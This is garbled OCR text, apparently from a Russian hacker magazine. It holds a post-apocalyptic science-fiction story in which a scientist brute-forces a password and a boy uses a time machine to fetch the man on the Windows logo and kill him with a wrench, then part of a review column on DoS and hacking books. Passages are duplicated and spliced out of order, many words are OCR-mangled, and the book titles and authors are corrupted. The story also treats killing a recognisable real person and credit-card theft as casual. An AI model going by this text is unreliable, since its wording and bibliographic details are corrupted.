Поперек горловины ущелья, частично закрывая собой 
ночное небо, лежал развалившийся при падении само- 
лет - стратегический бомбардировщик ВВС США, выра- 
ботавший свой моторесурс во время очередного выле- 
та. Его фюзеляж раскололся пополам, хвостовая 
часть осталась где-то снаружи, а кабина пилота 
рухнула почти на самое дно. Гринберг никогда в 
жизни не видел самолет так близко, его охватило 
чувство, схожее с паникой, но через несколько се- 
кунд он понял, что бомбардировщик мертв, как и все 
вокруг него. И тогда он начал подниматься обратно 
к своей ставшей ему родной двери. Приблизившись к 
ней, он понял, что работа окончена. 

Огромное многометровое крыло вонзилось в дверь и 
вынесло ее далеко в сторону. Дверной проем зиял 
таинственной чернотой. Мартин еще раз посмотрел на 
датчик кислорода и шагнул внутрь. 

Фонарь выхватил из темноты скелет, лежащий у само- 
го порога с рукой, протянутой к выходу. Кто-то то 
ли пытался выйти отсюда много лет назад, то ли хо- 
тел закрыть за собой дверь. Переборов страх, Грин- 
берг перешагнул через кости, прикрытые обветшавшей 
униформой, и прошел дальше. Узкий коридор вывел 
его в довольно просторное круглое помещение со 
множеством погасших экранов на стене. В центре за- 
ла находился такой же круглый стол или, скорее, 
пульт с несколькими компьютерами. О компьютерах 
Мартин знал от своего отца, тот рассказывал ему об 
этом не очень много, так как и сам был недостаточ- 
но информирован (он родился уже после Большой вой- 
ны, которая уничтожила практически все работающие 
компьютеры на Земле, превратив их в бесполезный 
хлам электромагнитным импульсом). 

Гринберг приблизился к пульту. За ним оказались 
еще три скелета, сидящие на полу спинами к внешней 
стене. На форме одного из них можно было разгля- 
деть нашивку “Служба контроля”. Мальчик шагнул к 
нему, чтобы найти какие-нибудь документы, объясня- 
ющие нахождение этого человека здесь, но тут запи- 
wan датчик кислорода. Воздуха оставалось только Ha 
обратную дорогу. 

Мартин застыл на полпути к скелету. Его детское со- 
знание не могло дать ему так просто уйти из таинст- 
венного места, где много лет назад обитали люди из 
загадочной “Службы контроля”. Он знал, что уже се- 
годня днем после налета здесь будет много народу, 
никто из ныне живущих никогда не видел настоящего 
самолета, не только Мартин; тем более из этого бом- 
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Линдон очнулся на 
полу вблизи 
компьютерного 
стола. Какого 
черта он встал с 
дивана? Сильно 
болели голова и 
правая рука - он 
не ударился, но, 
видимо, пролежал 
без чувств 
довольно долго, 
кисть затекла и 
сейчас давала о 
себе знать 
сильным 
покалыванием в 
пальцах. Дерек, 
опираясь на 
спинку кресла, 
приподнялся на 
колени лицом к 
экрану 
компьютера и 
едва снова не 
упал - в трее 
действительно 
горел конвертик. 


бардировщика можно попытаться извлечь что-нибудь полезное (хотя он, конечно же, 
“фонит” так, что внести какую либо деталь в жилую зону - практически невыполни- 
мая задача. Но не это важно - искатели приключений найдут эту дверь, потому что 
завалить ее чем-нибудь у Мартина сил не хватит - все более или менее подходящие 
обломки вагонов самолет одним движением смахнул на самое дно шахты, придавив там 
все пилотской кабиной. И он стал искать аварийный кислородный комплект. 
Он сумел открыть огромное число разных шкафчиков, ящиков, люков и дверей в раз- 
ные служебные помещения. Он понимал, что точка возврата уже пройдена, он погиб- 
нет по дороге домой от недостатка кислорода, и поэтому искал с все возрастающим 
упорством. И удача улыбнулась ему. В одной из маленьких комнаток он нашел в 
стене кислородный кран с универсальным наконечником. Ему удалось заправить два 
комплекта баллонов, после чего кран в стене издал тонкий шипящий звук, и давле- 
ние в нем упало. Но Мартину было достаточно того, что он успел перекачать, 
чтобы продержаться внутри еще около трех часов. И он занялся компьютерами. 
Самым простым оказалось включить один из них, самый большой. Кнопка “Power” 
вызывала у него однозначную реакцию - он нажал на нее, ящик под столом низко 
загудел, из-под него выдуло маленькое облачко пыли, послышался слабенький 
треск - там внутри что-то работало. Через мгновенье вспыхнул экран того, что 
отец называл монитором. На черном фоне появилось несколько строчек на англий- 
ском языке, заканчивающихся многоточиями, после чего выскочила надпись 
“Starting Windows...”, и на экране появилась та самая эмблема с двери - разно- 
цветный флаг с лицом на нем. 

- Windows... - прошептал Мартин. - Та самая Windows... 
Ему захотелось стереть пот со лба, рука в перчатке метнулась к лицу и стукну- 
лась о стекло шлема. Гринберг вздрогнул и словно очнулся от сна. Флаг исчез. На 
ровном голубом фоне монитора светились какие-то значки - “System”, “Trash”, 
“Fucking Documents” и еще несколько без подписей. На столе рядом с монитором 
лежала какая-то штука размером с ладонь; из нее выходил провод и убегал под 
стол. Больше всего она напомнила Мартину крысу-мутанта. Поверхность “крысы” была 
отполирована прикосновением рук (Гринберг оглянулся на скелеты - кто-то из них 
держал ее в руках много лет назад). Мальчик положил на нее свою ладонь - пальцы 
в Перчатке были несколько великоваты для этого устройства. На экране шевельну- 
лась какая-то стрелка - Мартин вздрогнул и убрал руку. Потом протянул ее вновь 

- стрелка ползла по экрану, повинуясь его движениям. И вот тут ему стало по- 
детски любопытно. Он, не глядя за спину, ногой достал кресло на колесиках, 
втиснулся в него с некоторым трудом (мешали баллоны на спине) и стал нажимать 
на “крысе” кнопки, тыкая ею во все значки на столе. Через десять - пятнадцать 
минут до него дошел принцип хранения информации внутри компьютера (хотя он по- 
прежнему был уверен, что монитор - самая важная часть умного устройства, ящик 
под столом его не заинтересовал). Пройдя через такие вещи, Kak “Explorer”, он 
догадался, что в компьютере содержится много всяких интересностей (правда, когда 
на экране появилось несколько фотографий обнаженных женщин в довольно непристой- 
ных позах, его мальчишеский взгляд дольше, чем положено, задержался на них). 
Гринберг понимал, что эта штука перед ним на столе существовала до войны в ог- 
ромном количестве. Из рассказов отца он знал, что компьютеры были практически 
у всех на Земле (не говоря уже о лунных станциях, которые были уничтожены то- 
чечными ударами арабов одними из первых). И еще он знал, что когда-то все люди 
Земли могли связаться друг с другом с помощью компьютера. Отец не смог объяс- 
нить сыну, что такое “электронная почта”, поскольку и сам никогда в жизни ее 
не видел, но связь с любым гражданином огромной планеты с помощью этой умной 
штуки - все-таки здорово! 
Он еще порылся в глубинах выпадающих прямоугольников с разными названиями и 
вдруг увидел строчку, привлекшую его внимание. 
“ALL We Are”. 
- Все мы, - проговорил про себя Мартин и, подведя стрелку к этим словам, 
щелкнул кнопкой “крысы”. 
“Scanning global net...” 
Мальчик ждал. На экране вместо стрелки вращался маленький глобус, не отвечаю- 
щий на прикосновение к кнопкам. Через пару минут глобус исчез; перед глазами 
Мартина появилось маленькое окошко (впечатление от раскрывающихся прямоуголь- 
ников было именно таким - они напоминали окна). 
“The search is completed. One removed resource is found”. 
Мартин, раскрыв рот, смотрел на одинокий значок в маленьком окошке - кусочек 
паутины с подписью под ним “The center of Time Research”. 

- Что это значит? - громко спросил сам себя Гринберг. - Там кто-то есть? Или 
пятьдесят лет назад там забыли включенный компьютер? 
Выбора не оставалось - стрелка ткнулась в значок. Появился вопрос: “Want to 
send the letter?”. Ответов было всего два - “Yes” и “No”. “Небогато”. Мартин 
ткнул в “Yes”, после чего в появившемся редакторе напечатал, с трудом находя 
одним пальцем буквы на клавиатуре, которую выкатил на специальной полочке из- 
под стола, и проговаривая вслух: 
- Здравствуйте. Меня зовут Мартин Гринберг. Я в Сиднее. Кто и где вы? 
Кнопка “Send Now”. Что-то мигнуло в углу экрана. 
“The message is sent. Will wait for confirmation?” 
- Конечно, буду ждать, - взглянув на датчик кислорода, который приветливо све- 
тился зеленым, сказал Мартин и, откатившись в кресле от стола, отправился в 
очередной раз исследовать помещения, которые он не сумел открыть. 


Линдон очнулся на полу вблизи компьютерного стола. Какого черта он встал с ди- 
вана? Сильно болели голова и правая рука - он не ударился, но, видимо, проле- 
жал без чувств довольно долго, кисть затекла и сейчас давала о себе знать 
сильным покалыванием в пальцах. Дерек, опираясь на спинку кресла, приподнялся 
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- Windows... - прошептал Мартин. - Та самая Windows... 


на колени лицом к экрану компьютера и едва снова 
He упал - в трее действительно горел конвертик. 

- Этого не может быть... - прошептал ученый. - Со- 
рок восемь лет... Это сбой. Или чье-то отсроченное 
послание. Наверное, кто-нибудь из наших, решив в 
очередной раз повеситься в туалете, накропал по- 
слание будущему поколению, указав в настройках 
что-то вроде “Открыть через двадцать лет”. И вот 
время пришло... 

Успокоив себя как только можно, Дерек аккуратно 
навел мышку на конвертик и щелкнул. Распахнулось 
маленькое окошко. Линдон прочитал текст, напеча- 
танный Мартином, и устало опустился во вращающееся 
кресло. 

ОДИНОЧЕСТВО КОНЧИЛОСЬ. 


- Привет, Мартин. Меня зовут Линдон Дерек. Я уче- 
ный из Центра по исследованию Времени. Я живу один 
уже пять лет... - вслух читал потрясенный Грин- 
берг. - Как ты сумел со мной связаться? Ответь 
обязательно. 

Так началась переписка Мартина и Линдона Дерека, 
которая продолжалась около месяца. Мальчик скрыл 
от отца факт контакта с профессором из Нью-Майкро- 
софт, сумев замаскировать-таки вход в зал “Службы 
контроля”, а через две недели найдя выход на_по- 
верхность в двухстах метрах от шахты метро. За это 
время ученый сумел отправить мальчику огромное ко- 
личество обучающей литературы; ребенок впитывал в 
себя все, словно губка, научившись работать на 
компьютере в объеме простого пользователя уже за 
две-три недели. К сожалению, на базовом компьютере 
“Службы контроля” было установлено крайне мало 
прикладных программ, в основном это был софт до- 
вольно непонятного назначения, большинство испол- 
няемых файлов обращалось просто в никуда (Мартин, 
побеседовав на эту тему с Линдоном, подозревал, 
что данные файлы запускали камеры наблюдения, ак- 
тивизировали приборы военного назначения - но все 
это было не более чем догадки). Но мальчишка сумел 
включить еще два компьютера в служебных помещени- 
ях, после чего жизнь пошла веселей. 

А потом случилось несчастье. Отец Мартина во время 
запуска очередной восстановленной ветроэнергоуста- 
новки упал с большой высоты и сломал себе обе но- 
ги. Лечить его было некому. Весь уход за калекой 
лег на плечи Мартина, он стал намного реже бывать 
у компьютера, чем вызвал беспокойство Линдона, 
привыкшего к ежедневным сообщениям электронной 
почты. Он искренне сочувствовал мальчику, на кото- 
рого свалилось горе. И тогда же между ними возник 
разговор на тему “С чего все началось”. 

Пытливый ум Мартина, терпящего все тяготы заботы 
за обезноженным отцом, обострился необычайно. Ог- 
лядываясь вокруг, ребенок не мог смириться с про- 
исходящим. Он первым и задал вопрос Линдону: 

- Как началась война? 

Профессор, сидя за компьютером, долго размышлял над 
ответом. Когда в Центре еще было много народу, меж- 
ду учеными часто разгорались споры на ту же тему - 
какая сволочь развязала эту войну? Дерек помнил, 
что пятьдесят лет назад в мире было относительно 
стабильно, никто не жаждал чьей-нибудь крови, рус- 
ские жили в мире с американцами, арабы с евреями, 
Индия с Пакистаном. Он помнил свои ощущения, когда 
узнал, что война началась, что двери закрыты наглу- 
хо, что его семья уже давно сгорела в горниле ядер- 
ного пламени. Он помнил, как первые несколько дней 
хотел лишь получить ответ на вопрос: “Зачем?”. Он 
был не единственным, кто метался по коридорам Цент- 
ра, криками поминая Господа; кто тайком в своих 
комнатах зажигал свечи за упокой детей; кто стоял 
соляным столбом у шлюза, отделявшего живых от ра- 
диоактивной пустыни. В отличие от Мартина, профес- 
сор не проводил большую часть жизни в противорадиа- 
ционном костюме - но это не добавляло оптимизма. 
Ноги периодически сами приносили его к выходу из 
Центра; он выглядывал в глазок из бронелинз и, видя 
перед собой длинные цепочки могил, вновь и вновь 
спрашивал себя и своих друзей: 

- Как мы потеряли эту планету? Кому было нужно все 
это? 


Друзья разводили руками, а по ночам плакали над 
семейными фотографиями; на утро кого-то можно было 
недосчитаться. .. 

Постепенно, с течением неумолимого времени, актуаль- 
ность вопроса стиралась; исчезали грани между разу- 
мом и безумием, вопрос был забыт. И вот мальчишка 
из далекого Сиднея всколыхнул в ученом давнишнюю 
боль. “Раз уж я остался в живых - может, попробо- 
вать найти ответ на этот вопрос?” - однажды после 
получения очередного письма подумал Линдон. Мартин 
пробудил в нем интерес к жизни и подтолкнул его на 
поиски ответа, напомнив, что профессор в данный мо- 
мент находится вблизи самого мощного уцелевшего из- 
за большой глубины расположения компьютера. 

Дерек попытался вспомнить структуру сети Центра. 
Каждый из ученых, занимающихся разработками для 
Нью-Майкрософт, имел доступ к Мозгу только через 
Милоша Радовича, который знал пароль. Всякий, кому 
было необходимо подключить к своему личному ком- 
пьютеру мощь главного, должен был дать запрос ди- 
ректору Центра, обосновать свою просьбу и получить 
временный пароль, сгенерированный при помощи по- 
стоянного. По окончании работы и выходе из сети 
временный пароль терял силу и больше не мог быть 
использован никогда. 

Дерек был уверен, что Мозг хранит хоть какую-то 
информацию о начале военной катастрофы - ведь они 
занимались изучением проблем, связанных с исполь- 
зованием Времени, с изменением скорости и направ- 
ления его течения. Компьютер с момента своего за- 
пуска содержал в памяти все события, заложенные в 
него терпеливыми руками хроноспециалистов. Он по- 
мнил неандертальцев и Луи Армстронга, динозавров и 
Стивена Спилберга, Колумба и “Ку-Клукс-Клан”; он 
помнил рушащиеся небоскребы Нью-Иорка и смерть Ро- 
беспьера; он знал все песни “Битлз” и романы Хе- 
мингуэя. И он должен был помнить, как началась 
война. Надо было только узнать пароль Радовича. 
...Линдон тихонько толкнул дверь личного кабинета 
директора и шагнул внутрь. Сколько раз он входил 
сюда за последние пятьдесят лет? Самому Дереку уже 
исполнилось семьдесят два года, а Милош, наверное, 
не дожил бы до этого дня, даже если бы не застре- 
лился, - ему уже тогда было далеко за сорок... 
Гробовая тишина, портрет Милоша в черной рамке над 
его столом, толстый слой пыли на всем - кресла, пол, 
стеклянные шкафы были покрыты ею, словно снегом. 

- Здравствуй, Милош, - кивнул Линдон портрету. - 
Хочу немного похозяйничать здесь, - он обвел рука- 
ми вокруг себя. Даже такое слабое движение вызвало 
волны в пыли, устлавшей стол; Линдон вернулся в 
коридор, раскрыл хозяйственную нишу и, достав от- 
туда необходимые принадлежности, навел в кабинете 
Радовича относительный порядок, прежде чем опус- 
титься за компьютер. 

Положив руки на клавиатуру, он ждал загрузки сис- 
темы, после чего ткнул мышкой в значок “Big Brain” 
и с ухмылкой взглянул на появившееся “Enter 
Password”. Это и было то, чем ему предстояло за- 
няться в ближайшее время. А в это время Мартин, 
сидя у изголовья умирающего отца, тайком читал се- 
кретные материалы Центра, пересланные ему Линдоном 
(тот давно уже снял с них гриф секретности - на 
Земле не осталось людей, от которых стоило прятать 
эти разработки)... 

Вначале Дерек предположил, что ничто человеческое 
не было чуждо и Милошу - директор мог просто запи- 
сать куда-нибудь пароль (в рабочий блокнот, на 
обороте фотографии жены или еще где-нибудь). Сам 
того не подозревая, он начал так же, как начинали 
многие хакеры, - очень часто нужное оказывается на 
поверхности; Дерек обыскал весь кабинет директора, 
пролистал каждую книгу в его библиотеке, перевер- 
нул ковер, простучал стены в поисках сейфа, пере- 
рыл карманы всех костюмов в шкафу (и с ужасом по- 
думал, что пароль был в том пиджаке, в котором Ми- 
лоша опустили в радиоактивную могилу). Этот путь 
поиска пароля не дал положительного результата - а 
Линдон выбыл из борьбы за пароль на двое суток, у 
него поднялось давление, закружилась голова, и, 
побоявшись свалиться с инсультом, как и Самюэль, 
он щадил себя до тех пор, пока не пришел в норму. 


“...Сегодня я 
совершу то, о чем 
мечтаю с того дня, 
как узнал о смерти 
своей семыи, - я 
присоединюсь к 
ней за Чертой. 
Тот, кто когда- 
нибудь прочтет 
эти строки, 
должен знать, что 
я все-таки не 
сумасшедший в 
полном смысле 
этого слова, - но 
сегодня я 
проснулся от того, 
что громко 
произнес это имя 
вслух. Да простят 
меня мои коллеги 
- я больше не могу 
видеть это лицо на 
стенах...” 


Следующим этапом Дерек направился в комнату, которая была закрыта во время нор- 
мального функционирования Центра и носила гордое название “Служба Контроля”. “Ин- 
тересно, что же объединяет этот отдел Центра и тот компьютерный зал, в котором 
Мартин нашел компьютеры?” размышлял Линдон, вытаскивая из оружейной штурмовую 
винтовку и зарядив в нее несколько патронов; потом он направился к заветной две- 
ри и, не долго думая, вынес ее замок двумя выстрелами. Дверь услужливо распахну- 
лась от двойного удара; Дерек, чувствуя себе ковбоем, закинул винтовку на плечо 
и шагнул внутрь. Его интересовало, чем занималась эта служба контроля и какие 
программы для своей работы ребята из этого подразделения ставили на свои машины. 
Линдон рассуждал так (вспоминая свою далекую молодость и несколько кредитных 
карточек, похищенных в школьном возрасте через Интернет) - если где-то есть 
компьютеры, то всегда найдется кто-нибудь, кто захочет незаконно воспользо- 
ваться данными на этих машинах; и поэтому должно существовать подразделение, 
которое обязано воспрепятствовать такому проникновению. И сотрудники этого 
подразделения должны в совершенстве знать не только свое “оружие”, но и “ата- 
кующий софт”. 

“Черт возьми, я помню даже такие слова, 
мне еще далеко...” 

Он включил один из компьютеров в помещении Службы Контроля и погрузился в изу- 
чение его содержимого. Огромное, просто немыслимое количество информации ока- 
залось ему непонятно - все-таки он был человеком, в основном занимающимся фун- 
даментальной наукой, большинство расчетов за него производили коллеги из вы- 
числительного отдела. Но не все было так плохо - он сумел найти программу, за- 
щищающую компьютеры от поиска файлов с паролями; изучив ее мануал, где пере- 
числялись поименно многие подобные программы, которые данный софт блокировал, 
найти их на компьютере не составило труда. 

Перепробовав несколько таких приложений, профессор остановил свое внимание на 
одном из них, у которого была еще самая большая база для перебора пароля по 
словарю (на случай неудачи). Времени у Линдона было хоть отбавляй, он подклю- 
чился к компьютеру Милоша и запустил программу, после чего продолжил чтение 
дневника директора, который нашел в столе. Перед его глазами проходила вся 
картина сумасшествия великого ученого, раздавленного всемирной катастрофой. 
“Как сейчас помню - я разговаривал со своим сыном за полчаса до первого взры- 
ва. Насколько мы успели услышать в новостях - в самых последних новостях, - та 
первая атака пришлась именно на Техас, где моя семья отдыхала в гостях у мате- 


- гордо подумал Дерек. - До маразма 


ри Джоанны. Хотя кто знает - может, было еще что-то и гораздо раньше... Ну 
почему Господь проклял Америку?” 
“Больше всего я боюсь произнести это имя вслух... Я, конечно, контролирую се- 


бя, но очень сложно следить за собой постоянно - начинаешь шарахаться от соб- 
ственного отражения в зеркале. А ведь если бы он был жив, я бы вышел на по- 
верхность и за данные мне лучевой болезнью несколько дней жизни нашел бы его и 
плюнул в мерзкую физиономию. Кто придумал сделать так, чтобы его имя я слышал 
каждый день по несколько раз?..” 

“...Сегодня я совершу то, о чем мечтаю с того дня, как узнал о смерти своей 
семьи, - я присоединюсь к ней за Чертой. Тот, кто когда-нибудь прочтет эти 
строки, должен знать, что я все-таки не сумасшедший в полном смысле этого сло- 
ва, - но сегодня я проснулся от того, что громко произнес это имя вслух. Да 
простят меня мои коллеги - я больше не могу видеть это лицо на стенах...” 

Эта запись была последней. На следующий день, если судить по дате, поставленной 
под ней, Милош взял пистолет и отправил на тот свет одиннадцать человек... Лин- 
дон был одним из тех, кто видел, прижавшись в коридоре к стене, как, прежде чем 
пустить пулю в себя, Радович несколько раз выстрелил в эмблему на двери Службы 
Контроля - и только потом вынес себе мозги. Щербины в двери потом замазали - но 
от этого они еще больше выделялись на лбу человека, улыбающегося с нее. 

Дерек не заметил, как задремал - по-старчески, пустив слюну на воротник зано- 
шенной рубашки и выронив на пол тетрадь Милоша. Ему снился мальчик по ту сто- 
рону океана... 


Мартин воткнул лопату в землю. Работа была закончена; его отец, скончавшийся 
от тяжелой болезни, последовавшей за травмой, покоился сейчас с миром в земле 
родной Австралии, и его могилу поливал радиоактивный дождь. Гринберг остался 
один в этом мире, несмотря на большое количество людей, окружающих его. Мать 
Мартина не пережила тридцатилетний рубеж - лучевая болезнь каким-то непостижи- 
мым образом настигла ее, когда она была беременна вторым ребенком. Больше род- 
ных у Гринберга не было. 

Самым близким человеком ему сейчас стал профессор Дерек из Нью-Майкрософт. Пе- 
реписка с ним оживилась. Те материалы, с которыми мальчик ознакомился, дали 
ему понять, что Центр достиг в своих экспериментах небывалых успехов, касаю- 
щихся непосредственно Времени. Он задавал Линдону огромное количество вопро- 
сов; профессор едва успевал отвечать на них. А когда к вопросу “Кто это сде- 
лал?” присоединился вопрос “Можно ли все исправить?”, Дерек всерьез задумался. 
- У меня под ногами в бетонном коробе компьютер, управляющий Временем, - произ- 
нес Линдон для самого себя. - А я хочу найти пароль, чтобы узнать, как началась 
война. Дьявол меня побери, но я ведь могу вернуть все назад - если найду тот 
день и час, когда первые ракеты взмыли в небо!.. 

Поиск файлов с паролями по какой-то причине результатов не дал. Тогда Дерек на- 
чал перебор паролей по словарю, отметив про себя, что за то время, которое про- 
грамме понадобится на большой Оксфордский словарь, он в состоянии ознакомиться с 
трудами своих коллег из других отделов. Работа поглотила его... 

Перетащив все доступные и понятные книги из библиотеки в кабинет Милоша, Лин- 
дон читал их и периодически бросал взгляды на монитор. “Access is denied” 
видел он постоянно на экране. Время перестало для него существовать. Перед ним 
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До Большой войны оставалось чуть меньше тридцати лет... 


из полувековой давности вставала полнота картины 
тех трудов, над которыми работал их Центр. Ученый 
вновь открывал для себя забытые законы и теоремы, 
постоянно помня фразу из дневника Радовича: “Ну 
почему Господь проклял Америку?”. 

Сколько прошло времени с момента запуска програм- 
мы, Линдон не знал. Он ел и спал прямо в кабинете, 
запасшись сухим пайком из подвалов Центра. Старче- 
ский организм мобилизовался из последних сил; изу- 
чая теорию перемещений во времени во второй раз в 
своей жизни и заново осознавая ее, Дерек сгорал 
как свеча. Но он должен был успеть две вещи - по- 
добрать пароль и суметь передать Мартину максимум 
информации в самой доступной форме. 

Тоненький звоночек вывел его из транса поглощения 
информации. 

“Просмотр основной базы паролей закончен. Доступ 
не получен. Подключить к просмотру все доступные 
словоформы и цифровые сочетания?” - прочитал Де- 
рек. - Ну конечно! - и он, ответив “Да”, продолжил 
самообразование. 

На другом конце ниточки, соединяющей профессора и 
Мартина, из принтера с завидной быстротой для уст- 
ройства, простоявшего в бездействии почти пятьде- 
CAT лет, вылетали страницы текста, переработанного 
Дереком для Гринберга. Мальчик просто не мог себе 
представить, каких сил требовало все это от учено- 
го, как таяло на глазах здоровье Линдона. Профес- 
сор уже практически не передвигался по Центру; по- 
явилась одышка, нарушился сон. Он превратился в 
машину не хуже главного компьютера; его работоспо- 
собности позавидовали бы многие молодые люди. И 
вот когда работа была практически закончена, ком- 
пьютер вновь позвал его к себе звонком. 

Дерек с огромным трудом встал с дивана, на котором 
отдыхал по своему расписанию. Ноги подкашивались 
от слабости, в последнее время Дерек почти ничего 
не ел. Он вдруг воочию увидел решение всей пробле- 
мы Времени и Большой войны и не мог тратить драго- 
ценные часы своей жизни (быть может, последние) на 
такую роскошь, как питание. 

На мониторе горело сообщение: 

“Просмотр окончен. Обнаружено одно сочетание, раз- 
решающее доступ. Просмотреть?”. 

Дерек молча нажал “Enter”. В маленьком красном 
окошке, точном аналоге того, в которое надо было 
ввести пароль, появилось слово из пяти букв. 
Линдон закрыл глаза. Он ожидал чего угодно, но 
только не этого. 

“Кто придумал сделать так, чтобы его имя я слышал 


каждый день по несколько раз?” - вспомнил он строч- 
ку из дневника Радовича. - “Сегодня я проснулся от 
того, что громко произнес это имя вслух...” 


“BILLY”. И бесконечные лица очкарика Ha эмблемах... 
- Билли, - прошептал Дерек. - Надо срочно сообщить 
Мартину. .. 

Он слабеющими пальцами набрал письмо мальчику, 
прицепил к нему последние файлы по экспериментиро- 
ванию со Временем и отправил этот пакет информации 
по назначению. После чего, прищурив подслеповатые 
глаза, ввел пароль, положил голову на ладони и 
умер, сидя за компьютером, который оживал от пяти- 
десятилетнего сна. Через двое суток, когда трупное 
окоченение закончилось, тело Дерека медленно 
сползло с кресла и упало у стола в стопку книг по 
темпоральным эффектам. .. 


По длительному молчанию профессора Мартин понял, 
что случилось несчастье. Подождав месяц, который 
мальчик потратил на тщательное изучение присланных 
Дереком материалов, он помолился за упокой души 
Линдона и впервые за все это время попытался войти 
в Большой Мозг. Пароль “Билли” он твердил наи- 
зусть; когда он, наконец, применил его по назначе- 
нию, подключение произошло; и через некоторое вре- 
мя Мартин решился на эксперимент. Он вытащил из 
холодных вод Атлантики шестнадцать тонущих чело- 
век, а затем вернул их обратно. Зачем был нужен 
этот достаточно бесчеловечный опыт, Мартин не смог 
объяснить даже самому себе (ему еще долго снились 
те два мальчика, которые оставили свои жилеты в 
комнате Службы Контроля, прежде чем вновь окунуть- 


ся в волны с ледяной крошкой). Но факт остается 
фактом - Большой Мозг умело управлял прошлым. Про- 
фессор неоднократно уточнял, что с будущим могут 
быть проблемы, но Гринбергу до будущего не было 
никакого дела. Все свое свободное время он прово- 
дил за компьютером, пытаясь правильно сформулиро- 
вать условия поиска. 

Кислородный кран, так быстро замолчавший в первый 
день, внезапно начал исправно функционировать, что 
дало мальчику невероятную свободу. Он открывал в 
себе большие способности, самостоятельно осваивая 
основы информатики и алгоритмизации, логики и про- 
граммирования. В Большом Мозге были скрыты поисти- 
не неисчерпаемые объемы информации. И вот настал 
день, когда Мартин Гринберг мог сказать самому се- 
бе, что запрос на поиск готов. Компьютер найдет в 
прошлом того, кто послужил катализатором в страш- 
ной народоубийственной войне. Найдет и доставит 
сюда в “Службу Контроля”, под разноцветный флаг на 
потолке. И мальчик знал, что он с ним сделает... 
Подготовка была долгой. Команды вводились тщатель- 
но, каждый символ проверялся неоднократно. Сердце 
нещадно колотилось в груди мальчика; настал день, 
ради которого работал и умер Линдон Дерек, день 
ответа на самый главный вопрос. 

Последнее нажатие клавиш. Тишина. Побочный эффект 
в виде головокружения и временной потери ориента- 
ции в пространстве. Негромкий хлопок, всегда пред- 
шествующий материализации объектов. 

Перед ним у стены стоял человек. Невысокого роста, 
в строгом деловом костюме. Он испуганно озирался 
по сторонам, а потом увидел встающего из-за ком- 
пьютера Мартина и испугался еще больше. А секундой 
позже он увидел эмблему на потолке. 

На флаге было его лицо. Его улыбка, его очки, его 
летящий флаг. И все встало на свои места. Война 
была случайностью, порожденной компьютерами. И 
Большой Мозг не смог выполнить ничего более дейст- 
венного, чем найти того, кто все это придумал. Он 
нашел и доставил его сюда. 

Мартин шагнул к напуганному человечку и припрятан- 
ным на этот случай гаечным ключом вышиб ему мозги. 
После чего вернулся на свое место и стал ждать ре- 
акции Времени. 

Стены поплыли вокруг мальчика. Зрение стало нечет- 
ким, заложило уши; он попытался лечь на пол, но не 
успел - что-то мощно толкнуло его в спину, и по- 
следнее, что он запомнил в этой жизни, - как его 
шлем разбивается об угол стола... 


...Он бодро шел по залитой ярким солнцем улице до- 
мой. Сегодня последний учебный день, завтра - ка- 
никулы, а отец обещал ему показать Большой Барьер- 
ный риф!.. По обочинам улицы зеленели деревья, га- 
зоны были полны цветов и сочной травы. Лето в Ав- 
стралии было в разгаре. На крыльце дома сидел 
отец; он приветливо помахал сыну рукой, еще издали 
заметив того. 

- Эге-гей, Мартин! - 
есть для тебя! 
Гринберг-младший прибавил шагу. Когда он вошел во 
двор, отец протянул ему средней толщины брошюру в 
мягкой обложке: 

- Вот так, черт меня побери, надо делать бизнес! 
Хочу, чтобы и мой мальчик сумел добиться в жизни 
чего-то подобного! 

Мартин взял книгу в руки. “ЛИНУС ТОРВАЛЬДС. Как я 
заработал свой первый миллион долларов”. Фотогра- 
фия улыбающегося человека на фоне большого нарисо- 
ванного пингвина. 

- Обязательно прочти! - похлопал отец Мартина по 
плечу. - И я там тебе подарок приготовил - как-ни- 
как, ты перешел в выпускной класс! 

Мальчик пулей влетел по лестнице на второй этаж в 
свою комнату. На столе стоял (ну конечно же!) ком- 
пьютер. Новенький компьютер с предустановленным 
Линуксом. 

До Большой войны оставалось чуть меньше тридцати 
лет... 


закричал он. - У меня кое-что 


= 
=. 
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КНИЖКИ 


СтТюлдАРТ MAH—HnaAP, ОЖОЕП CHEMBPEU, 
ОжорРож НчрРИЦ. СЕНРЕТЫ НАНЕРОВ — М.: 
Bunbamc, 2001 — 651 с. 


В книжке уделена целая глава 
005-атакам. При полном 
изучении сей познавательной 
литературы обнаружилось 
довольно ясное и подробное 
описание проблемы, 
связанной с взломом и в 
частности по DoS’y. А также 
нашлись главы по взлому 
WindowsNT/9x, Unix, Nowell. 
Достаточно хорошо 
изложенные темы оставляют 
приятное впечатление после 
прочтения, материал написан 
понятным и доступным 
языком, так что вопросов возникнуть не должно. К 
сожалению, автор не рассказывает об основах строения 
сети, наверное, надеется на знания читателя. Зато в книге 
рассмотрена уйма примеров с описаниями работы самых 
распространенных прог для сканирования, пинга, 
сниффинга и прочих действий, совершаемых при анализе 
атакуемого хоста. 
Чтение этой книги будет тебе полезно, если вдруг захочется 
побольше узнать про сетевые атаки. 


ЭРОН Horn. PYHOBODCTBO ПО ЗАШОТЕ ОТ 
HAHEPOB. — М.: Випьямс, 200е — 634 с. 


Несмотря на дурацкое 
название, книженция 
оказалась достаточно 
полезной и интересной. В ней 
по полочкам расставлены все 
известные способы взломов 
(DoS-ataku, естественно, тоже 
присутствуют). Есть описания 
эксплоитов, соответствующих 
определенным уязвимостям. 
Рассматривается достаточно 
много программного кода - 
автор не заморачивается на 
сухой теории и лезет 
достаточно глубоко, 
расковыривая код и понимая, что предпосылкой 
практически любого взлома в конечном итоге являются 
ошибки программирования. 
Эта книжка окажется полезной всем, кто хочет ясно 
представлять себе, какие виды атак встречаются в 
цифровых джунглях, чем они характерны и чем отличаются. 
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Дарова, дружище! У нас в этом номере рулезнейшая 
тема - DoS-ataku, и я тебе сейчас предложу обзор 
литературы, в которую ты можешь вгрызться, если 
хочешь погрузиться в Во5-атаки по самые уши. 
Собственно книг, целиком посвященных 0о5` кам, не 
существует, зато в талмудах по безопасности им 
уделены целые главы :). Так что впитывай и бегом в 
магазин. 


HPeuc HACNEPCHU. 
TEHHUHA СЕТЕВЫН АТАН — М.: СОПОН-Р, 
2001 — 400 с. 


ТЕННУНА Ц ФУПОСОФУЯ HAHEPCHUH АТАН — 
m.: СОПОН-Р, 2001 — ene с. 


Небезызвестный Крис 
Касперски, не раз 
замеченный в первых 
выпусках ][, попал :) ив 
сегодняшний обзор. Его 
книги, в отличие от 
предыдущей, написаны как 
для людей, только 
начинающих вникать в 
хакерский мир, так и для 
более продвинутых 
товарищей. 

В первой из них ты 
познакомишься с основными 
принципами работы сети 
Интернет (то есть отсюда ты 
узнаешь про протоколы, 
